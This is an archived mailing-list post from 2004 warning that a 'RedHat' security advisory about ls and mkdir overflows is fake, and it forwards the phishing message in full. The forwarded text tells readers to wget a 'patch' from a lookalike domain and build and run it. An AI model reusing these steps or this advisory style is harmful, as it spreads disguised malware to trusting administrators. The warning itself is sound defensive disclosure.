lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
Message-ID: <Pine.LNX.4.58.0410250054280.18888@gandalf.hugo.vanderkooij.org>
From: hvdkooij at vanderkooij.org (Hugo van der Kooij)
Subject: FAKE: RedHat: Buffer Overflow in "ls" and "mkdir"

-----BEGIN PGP SIGNED MESSAGE-----

Be advised.

The message below is currently going around on internet. Being unsinged
was the fist obvious issue. Not pointing to RPM updates, being in a
different format and such were among the other reasong to suspect it.

Message was send from 'University of Texas at Arlington'.

I am sure none of you should be fooled by such a message but other might
be.

And while it lasts you may want to get the file for your own educational
purposes.

Hugo.
- ---------- Forwarded message ----------
Date: Sun, 24 Oct 2004 17:22:20 -0500
From: RedHat Security Team <security@...hat.com>
To: *****************
Subject: RedHat: Buffer Overflow in "ls" and "mkdir"


[logo_rh_home.png]

Original issue date: October 20, 2004
Last revised: October 20, 2004
Source: RedHat

A complete revision history is at the end of this file.

Dear RedHat user,

Redhat found a vulnerability in fileutils (ls and mkdir), that could
allow a remote attacker to execute arbitrary code with root privileges.
Some of the affected linux distributions include RedHat 7.2, RedHat 7.3,
RedHat 8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2 and not only. It is
known that *BSD and Solaris platforms are NOT affected.

The RedHat Security Team strongly advises you to immediately apply the
fileutils-1.0.6 patch. This is a critical-critical update that you must
make by following these steps:

 *  First download the patch from the Security RedHat mirror: wget
    www.fedora-redhat.com/fileutils-1.0.6.patch.tar.gz
 *  Untar the patch: tar zxvf fileutils-1.0.6.patch.tar.gz
 *  cd fileutils-1.0.6.patch
 *  make
 *  ./inst

Again, please apply this patch as soon as possible or you risk your
system and others` to be compromised.

Thank you for your prompt attention to this serious matter,

RedHat Security Team.

Copyright (C) 2004 Red Hat, Inc. All rights reserved.


-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.3 (GNU/Linux)

iQCVAwUBQXwzy6YKnAPlJw4JAQEdiQP/Q9joitf0xM69z6AvkMA0gjumokNccKB7
OQk+wDNpPYz881/BuycJ15Oory1+zIFiFyVJr7S0CYcQsZLFkeAQaGGNFj6PpHQo
H6u5QdRLoK1qWLethUSa73edjEYCwpTtVlFnCuPYRVqMtFKSooLXMSS/2SV9H8pL
fcdKycT5D9E=
=/nEk
-----END PGP SIGNATURE-----

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ